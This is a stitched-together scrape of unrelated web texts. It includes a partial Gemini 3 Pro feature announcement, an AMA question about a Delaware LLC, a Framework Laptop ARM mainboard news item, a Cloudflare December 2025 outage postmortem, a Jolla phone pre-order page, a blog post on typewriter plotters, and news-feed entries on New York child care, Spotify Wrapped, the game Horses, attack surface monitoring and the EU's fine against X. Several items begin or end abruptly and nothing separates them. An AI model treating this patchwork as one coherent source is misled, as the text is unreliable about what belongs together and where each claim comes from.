Prompt: “Here is a photo of my homework attempt. Please check my steps and tell me where I went wrong. Instead of explaining in text, show me visually on my image.” (Note: Student work is shown in blue; model corrections are shown in red). [
See prompt in Google AI Studio
]
Medical and biomedical imaging
Gemini 3 Pro
1
stands as our most capable general model for medical and biomedical imagery understanding, achieving state-of-the-art performance across major public benchmarks in MedXpertQA-MM (a difficult expert-level medical reasoning exam), VQA-RAD (radiology imagery Q&A) and MicroVQA (multimodal reasoning benchmarks for microscopy based biological research).
Input image from
MicroVQA
- a benchmark for microscopy-based biological research
Law and finance
Gemini 3 Pro’s enhanced document understanding helps professionals in finance and law tackle highly complex workflows. Finance platforms can seamlessly analyze dense reports filled with charts and tables, while legal platforms benefit from the model's sophisticated document reasoning.
6. Media resolution control
Gemini 3 Pro improves the way it processes visual inputs by preserving the native aspect ratio of images. This drives significant quality improvements across the board.
Additionally, developers gain granular control over performance and cost via the new
media_resolution
parameter. This allows you to tune visual token usage to balance fidelity against consumption:
High resolution:
Maximizes fidelity for tasks requiring fine detail, such as dense OCR or complex document understanding.
Low resolution:
Optimizes for cost and latency on simpler tasks, such as general scene recognition or long-context tasks.
Hi Peter, thanks for doing the AMA!
I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely.
However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years.
I however, genuinely want to come to the states to open the bank account and actually expand my business into the US.
The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?
OR should I just close it and try the normal route? Thanks in advance!
Framework Laptop 13 gets ARM processor with 12 cores via upgrade kit
The Framework Laptop 13 can now be equipped with an ARM processor (Image source: Notebookcheck)
The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.
The
Qualcomm Snapdragon X Plus
and
Snapdragon X Elite
have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.
MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installe in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the
Minisforum MS-R1
. This processor has a total of eight ARM Cortex-A720 performance cores, the two fastest can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.
The mainboard can be installed in the Framework Laptop 13 or a mini PC case (Image source: MetaComputing)
Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade might only be interesting for developers for the most part, because
early tests
show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55Wh battery of the Framework Laptop 13.
Price and availability
The MetaComputing ARM AI PC Kit is available now at the manufacturer’s
official online shop
. The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.
Since 2009 I have written for different publications with a focus on consumer electronics. I joined the Notebookcheck news team in 2018 and have combined my many years of experience with laptops and smartphones with my lifelong passion for technology to create informative content for our readers about new developments in this sphere. In addition, my design background as an art director at an ad agency has allowed me to have deeper insights into the peculiarities of this industry.
Translator:
Enrico Frahn
- Managing Editor Accessory Reviews, Tech Writer
- 5837 articles published on Notebookcheck
since 2021
My fascination for technology goes back a long way to the Pentium II era. Modding, overclocking and treasuring computer hardware has since become an integral part of my life. As a student, I further developed a keen interest in mobile technologies that can make the stressful college life so much easier. After I fell in love with the creation of digital content while working in a marketing position, I now scour the web to bring you the most exciting topics in the world of tech. Outside the office, I’m particularly passionate about motorsports and mountain biking.
On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.
A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected as described below.
The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability
disclosed this week
in React Server Components.
Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.
What happened
The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).
Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.
As part of our ongoing work to protect customers using React against a critical vulnerability,
CVE-2025-55182
, we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.
This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.
Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review
following the outage we recently experienced on November 18
.
In our FL1 version of our proxy under certain circumstances, this latter change caused an error state that resulted in 500 HTTP error codes to be served from our network.
As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module which led to the following LUA exception:
[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)
resulting in HTTP code 500 errors being issued.
The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.
Customers that have their web assets served by our older FL1 proxy
AND
had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as
/cdn-cgi/trace
.
Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.
The runtime error
Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “
block
”, “
log
”, or “
skip
”. Another type of action is “
execute
”, which is used to trigger evaluation of another ruleset.
Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.
We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.
However, we have never before applied a killswitch to a rule with an action of “
execute
”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:
if rule_result.action == "execute" then
rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end
This code expects that, if the ruleset has action=”execute”, the “rule_result.execute” object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua returned an error due to attempting to look up a value in a nil value.
This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.
What about the changes being made after the incident on November 18, 2025?
We made an unrelated change that caused a similar,
longer availability incident
two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.
We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.
We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:
Enhanced Rollouts & Versioning
: Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.
Streamlined break glass capabilities:
Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.
"Fail-Open" Error Handling:
As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.
Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.
These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.
Timeline
Time (UTC)
Status
Description
08:47
INCIDENT start
Configuration change deployed and propagated to the network
08:48
Full impact
Change fully propagated
08:50
INCIDENT declared
Automated alerts
09:11
Change reverted
Configuration change reverted and propagation start
Visit
1.1.1.1
from any device to get started with our free app that makes your Internet faster and safer.
To learn more about our mission to help build a better Internet,
start here
. If you're looking for a new career direction, check out
our open positions
.
Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected.
...
Cloudflare suffered a service outage on November 18, 2025. The outage was triggered by a bug in generation logic for a Bot Management feature file causing many Cloudflare services to be affected.
...
In Q3 2025, we observed Internet disruptions around the world resulting from government directed shutdowns, power outages, cable cuts, a cyberattack, an earthquake, a fire, and technical problems, as well as several with unexplained causes.
...
On September 29, 2025, Internet connectivity was completely shut down across Afghanistan, impacting business, education, finance, and government services.
...
User configurable physical Privacy Switch - turn off you microphone, bluetooth, Android apps, or whatever you wish
Scandinavian styling in its pure form
Honouring the original Jolla Phone form factor and design
Replaceable back cover
Available in three distinct colours inspired by Nordic nature
Available in distinct user replaceable colours
Snow White
Kaamos Black
The Orange
An Independent Linux Phone
A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs and honoring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.
A phone you can actually daily-drive. Still Private. Still Yours.
Defined together with the Community
Over the past months, Sailfish OS community members
voted
on what the next Jolla device should be. The key characteristics, specifications and features of the device.
Based on community voting and real user needs, this device has only one mission:
Put control back in your hands.
KEY BENEFITS OF PRE-ORDERING
Special Edition Back Cover — Pre-order batch only
Made as a thank-you to early supporters
Directly contribute in making the product a reality
Community Voice, Real Device:
The
questionnaire
received overwhelming flow of input and this project captures that
Now it is time to act!
Your pre-order determines whether the project becomes reality
Built for Longevity
Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for minimum 5 years. Incremental updates, and no forced obsolescence.
Your Phone Shouldn’t Spy on You
Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.
Sailfish OS stays silent unless you explicitly allow connections.
DIT: DO IT TOGETHER
This isn’t your regular smartphone project.
It’s a community mission.
You voted on the device
You guided its specs and definition
You shaped the philosophy
And now you help bring it to life
Every pre-order makes production become a reality.
Cellular: 4G + 5G with dual nano-SIM and global roaming modem configuration
Display: 6.36” ~390ppi FullHD AMOLED, aspect ratio 20:9, Gorilla Glass
Cameras: 50MP Wide + 13MP Ultrawide main cameras, front facing wide-lens selfie camera
Battery: approx. 5,500mAh, user replaceable
Connectivity: WiFi 6, BT 5.4, NFC
Dimensions: ~158 x 74 x 9mm
Other: Power key fingerprint reader, user changeable backcover, RGB indication LED, Privacy Switch
Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.
FAQ
Why a pre-order system?
Because this is a community-funded device and we need committed pre-orders to turn the designs into a full product program and commit to order the first production batch. If we reach
2,000 units
we start the full product program. If not, you get a full refund.
Is the 99 € refundable?
Yes. Fully.
What is the normal price of the product, do I get discount participating to the pre-order?
The final price of the product is not set yet but we estimate it to settle between 599€ - 699€ (incl. your local VAT). The final price depends on the confirmation of the final specification and the Bill-of-Materials, which happens on due course during the product program. Notably in particular memory component prices have had exceptionally high volatility during this year.
By pre-ordering you confirm your special price of total 499€.
Can I cancel anytime?
Yes.
Is this phone real or just a concept?
It is real. Definition and real electro-mechanical design is underway, based on the community voting. To turn the designs into a full product program and commit to order the first batch, we need in minimum 2,000 committed pre-orders.
When will full specs be available?
Once the manufacturing pathway is confirmed at 2,000 pre-orders.
Will there be accessories, like a spare battery and protective case?
Yes, there will be. We’ll make those available on due course the project.
When will the phone ship?
Estimated by end of
1H/2026
.
Will the Jolla Phone work outside Europe, can I use it e.g. in the U.S.?
Yes, we will design the cellular band configuration to enable global travelling as much as possible, including e.g. roaming in the U.S. carrier networks.
Can I buy the Jolla Phone if I’m outside Europe, can I use it e.g. in the U.S.?
The initial sales markets are EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada are to be decided due course based on potential interest from the areas.
We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.
Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.
Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is it would use a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice is was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.
Panasonic
RK-P400C Penwriter
Panasonic made three models. The top shelf was the
RK-P400C Penwriter
which included the RS-232 port built in for computer control. They also came with a white pen for error correcting.
Here’s a video of the Panasonic RK-P400C Penwriter typewritter plotter drawing a design under computer control via RS-232. The
manual is available from Archive.org
.
Mona Triangles on a Panasonic RK-P400C typewriter plotter.
Panasonic RK-P440 Penwriter
A lower end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K100 external interface. Otherwise functionally the same: draws texts as well as business graphics with 4 color ballpoint pens. Portable using 6 C batteries.
The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.
Here’s a video of the Panasonic RK-P400 Penwriter plotting the demo page using four ballpoint pens.
Panasonic RK-P200C Penwriter
Panasonic
also had the basic
RK-P200C Penwriter
which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.
Silver Reed EB50
There were other ballpoint pen based typewriters, such as this
Silver Reed EB50
. It draws text and business graphics too but this one has a parallel port to act as a plotter. I added support for it to my workflow and it’s a very good.
Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.
Smith Corona
Graphtext 90
Smith Corona
sold the
Graphtext 90
. No computer control. Same pens and also ran on batteries.
Brother
Type-a-Graph BP-30
Not to be left out,
Brother
offered the
Type-a-Graph BP-30
. Pics from eBay— there’s usually a lot of these for sale.
Sears
LXI Type-O-Graph
Even
Sears
got into the game with the
LXI Type-O-Graph
(by likely rebranding the Brother Type-a-Graph, they look the same). Mine has a flaw in the print head mechanism.
Sharp EL-7050
Calculator
Adding to the oddware that included pen plotters in them, there was even a calculator with a tiny plotter built-in. This is the
Sharp EL-7050
calculator with a built in plotter printer. It could act as a usual printing calculator but it could also draw graphs and pie charts of data sets.
Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.
And here’s the Sharp EL-7050 calculator plotting the graph.
Music Keyboard
Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. The reality is the plotter was so much slower than you could play, it would take forever to catch up. It also wasn’t great at quantization so the notes were likely not what you’d expect.
Built In Plotters
Many small computers in the 1980s also had plotters available like the
Commodore 1520
and the
Atari 1020
. They used 4” wide paper and the same pens.
Some “slabtops” had built in pen plotters like the
Casio PB-700
,
Radio Shack Tandy PC-2
, and
Sharp PC-2500
.
Pens
All of the typewriter models used the same ball point pens in four colors (black, red, green, blue) and were portable with a built-in handle and could run on batteries. They also likely all used the same plotter mechanisms made by Alps.
The pens are rather scarce now, mostly all that remains are NOS (new old stock) with some exceptions for a couple of German companies that make replacements for medical equipment that fit.
These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.
Mamdani’s First 100 Days, Child Care Edition: 'Fixing What Adams Broke'
hellgate
hellgatenyc.com
2025-12-05 15:07:51
Free universal child care is the incoming mayor's biggest promise—here's what he needs to do immediately to make it happen, according to experts....
Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.
First up, a look at his plans for universal free child care.
Zohran Mamdani has consistently
said
that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he promised, and the one that comes with the
biggest price tag
–a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to position himself to be ready to get to work as soon as he's in office—and to tackle multiple challenges at once.
The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.
I spent hours listening to Sabrina Carpenter this year. So why do I have a Spotify ‘listening age’ of 86?
Guardian
www.theguardian.com
2025-12-05 15:07:00
Many users of the app were shocked, this week, by this addition to the Spotify Wrapped roundup – especially twentysomethings who were judged to be 100 “Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news. I wok...
“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.
I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day
Spotify
released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.
“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.
It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.
But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,”
wrote one user
on X. Another
post
, with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.
“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.
“How could I have a listening age of 86?” I raged to my family and friends, when the artist I listened to the most this year was 26-year-old Sabrina Carpenter? Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.
The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).
Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.
It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.
What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.
None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had
500 million
shares on social media, a 41% increase on last year.
According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.
In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.
But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.
Horror game Horses has been banned from sale – but is it as controversial as you’d think?
Guardian
www.theguardian.com
2025-12-05 15:04:14
Pulled by Steam and Epic Games Store, indie horror Horses shook up the industry before it was even released. Now it’s out, all the drama surrounding it seems superfluous On 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnal...
O
n 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia,
revealed that its latest project, Horses
, had been banned from Steam - the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.
The controversy has helped the game rocket to the top of the digital stores that
are
selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.
Controversial … Horses.
Photograph: Santa Ragione
The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.
Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.
It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).
Unsettling … Horses.
Photograph: Santa Ragione
The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.
Valve, the company that owns Steam,
told PC Gamer
that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”
According to
IGN
, Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”
Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape, while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film), super-up-close shots of mouths moving as they talk or chew, unsettling character models, the occasional cut to a real-life shot of water pouring in a glass or slop filling up a dog bowl.
There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.
A Practical Guide to Continuous Attack Surface Visibility
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 15:00:10
Passive scan data goes stale fast as cloud assets shift daily, leaving teams blind to real exposures. Sprocket Security shows how continuous, automated recon gives accurate, up-to-date attack surface visibility. [...]...
AUTHOR: Topher Lyons, Solutions Engineer at Sprocket Security
The Limits of Passive Internet-Scan Data
Most organizations are familiar with the traditional approach to external visibility: rely on passive internet-scan data, subscription-based datasets, or occasional point-in-time reconnaissance to understand what they have facing the public internet. These sources are typically delivered as static snapshots of lists of assets, open ports, or exposures observed during a periodic scan cycle.
While useful for broad trend awareness, passive datasets are often misunderstood. Many security teams assume they provide a complete picture of everything attackers can see. But in today’s highly dynamic infrastructure, passive data ages quickly.
Cloud footprints shift by the day, development teams deploy new services continuously, and misconfigurations appear (and disappear) far faster than passive scans can keep up.
As a result, organizations relying solely on passive data often make decisions based on stale or incomplete information.
To maintain an accurate, defensive view of the external attack surface, teams need something different: continuous, automated, active reconnaissance that verifies what’s actually exposed every day.
Today’s Attack Surface: Fast-Moving, Fragmented, and Hard to Track
Attack surfaces used to be relatively static. A perimeter firewall, a few public-facing servers, and a DNS zone or two made discovery manageable. But modern infrastructure has changed everything.
Cloud adoption has decentralized hosting, pushing assets across multiple providers and regions.
Rapid deployment cycles introduce new services, containers, or endpoints.
Asset sprawl grows quietly as teams experiment, test, or automate.
Shadow IT emerges from marketing campaigns, SaaS tools, vendor-hosted environments, and unmanaged subdomains.
Even seemingly insignificant changes can create material exposure. A DNS record that points to the wrong host, an expired TLS certificate, or a forgotten dev instance can all introduce risk. And because these changes occur constantly, visibility that isn’t refreshed continuously will always fall out of sync with reality.
If the attack surface changes daily, then visibility must match that cadence.
Why Passive Data Fails Modern Security Teams
Stale Findings
Passive scan data becomes outdated quickly. An exposed service may disappear before a team even sees the report, while new exposures emerge that weren’t captured at all. This leads to a common cycle where security teams spend time chasing issues that no longer exist while missing the ones that matter today.
Context Gaps
Passive datasets tend to be shallow. They often lack:
Ownership
Attribution
Root-cause detail
Impact context
Environmental awareness
Without context, teams can’t prioritize effectively. A minor informational issue may look identical to a severe exposure.
Missed Ephemeral Assets
Modern infrastructure is full of short-lived components. Temporary testing services, auto-scaled cloud nodes, and misconfigured trail environments might live for only minutes or hours. Because passive scans are periodic, these fleeting assets often never appear in the dataset, yet attackers routinely find and exploit them.
Duplicate or Irrelevant Artifacts
Passive data commonly includes leftover DNS records, reassigned IP space, or historical entries that no longer reflect the environment. Teams must manually separate false positives from real issues, increasing alert fatigue and wasting time.
Continuous Reconnaissance: What It Is (and Isn’t)
Automated, Active Daily Checks
Continuous visibility relies on recurring, controlled reconnaissance that automatically verifies external exposure. This includes:
Detecting newly exposed services
Tracking DNS, certificate, and hosting changes
Identifying new reachable hosts
Classifying new or unknown assets
Validating current exposure and configuration state
This is not exploitation, or intrusive actions. It’s safe, automated enumeration built for defense.
Environment-Aware Discovery
As infrastructure shifts, continuous recon shifts with it. New cloud regions, new subdomains, or new testing environments naturally enter and exit the attack surface. Continuous visibility keeps pace automatically with no manual refresh required.
What Continuous Visibility Reveals (That Passive Data Can’t)
Newly Exposed Services
These exposures often appear suddenly and unintentionally:
A forgotten staging server coming online
A developer opening RDP or SSH for testing
A newly created S3 bucket left public
Daily verification catches these before attackers do.
Misconfigurations Introduced During Deployments
Rapid deployments introduce subtle errors:
Certificates misapplied or expired
Default configurations restored
Ports opened unexpectedly
Daily visibility surfaces them immediately.
Shadow IT and Rogue Assets
Not every externally exposed asset originates from engineering. Marketing microsites, vendor-hosted services, third-party landing pages, and unmanaged SaaS instances often fall outside traditional inventories, yet remain publicly reachable.
Real-Time Validation
Continuous recon ensures findings reflect today’s attack surface. This dramatically reduces wasted effort and improves decision-making.
Turning Reconnaissance into Decision Making
Prioritization Through Verification
When findings are validated and current, security teams can confidently determine which exposures pose the most immediate risk.
Triage Without Hunting Through Noise
Continuous recon removes stale, duplicated, or irrelevant findings before they ever reach an analyst’s queue.
Clear Ownership Paths
Accurate attribution helps teams route issues to the correct internal group, like engineering, cloud, networking, marketing, or a specific application team.
Reduced Alert Fatigue
Security teams stay focused on real, actionable issues rather than wading through thousands of unverified scan entries.
How Sprocket Security Approaches ASM
Sprocket’s ASM Community Edition Dashboard
Daily Reconnaissance at Scale
Sprocket Security
performs automated, continuous checks across your entire external footprint. Exposures are discovered and validated as they appear, whether they persist for hours or minutes.
Actionable Findings
Through our ASM framework, each finding is classified, verified, attributed, and prioritized. This ensures clarity, context, and impact without overwhelming volume.
Removing Guesswork from ASM
A validated, contextualized finding tells teams:
What changed
Why it matters
How severe it is
Who owns it
What action to take
Compared to raw scan data, this eliminates ambiguity and reduces the time it takes to resolve issues.
Getting a Handle on Your Attack Surface
Here are some of the ways that organizations can ensure thorough monitoring of their attack surface:
Today’s attack surfaces evolve constantly. Static, passive datasets simply cannot keep up. To stay ahead of emerging exposures and prevent easily avoidable incidents, security teams need continuous, automated reconnaissance that reflects the real state of their environment.
Relying solely on passive data creates blind spots. Continuous visibility closes them. As organizations modernize their infrastructure and accelerate deployment cycles, continuous reconnaissance becomes the foundation of attack surface hygiene, prioritization, and real-world risk reduction.
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).
This is the first non-compliance ruling under the DSA, a
set of rules adopted in 2022
that requires platforms to remove harmful content and protect users across the European Union.
The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were
shared with X
in July 2024.
Regulators found that X had
breached transparency requirements
through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.
